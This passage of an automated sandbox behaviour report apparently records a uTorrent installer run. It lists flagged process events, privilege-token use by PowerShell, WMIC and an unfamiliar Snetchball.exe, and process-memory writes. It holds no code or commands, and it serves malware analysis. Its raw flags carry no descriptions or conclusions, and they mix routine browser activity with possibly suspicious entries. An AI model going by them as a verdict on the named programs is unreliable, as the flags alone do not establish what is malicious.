N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 396 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe
PID 396 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe
PID 396 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe
PID 3132 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
PID 3132 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
PID 3132 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
PID 2008 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 1408 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1408 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1992 wrote to memory of 2808 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1992 wrote to memory of 2808 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 2008 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 1984 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1984 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 4548 wrote to memory of 4092 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 4548 wrote to memory of 4092 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 3152 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 3152 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2696 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2696 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 2008 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 4508 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 4508 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1232 wrote to memory of 2640 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1232 wrote to memory of 2640 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
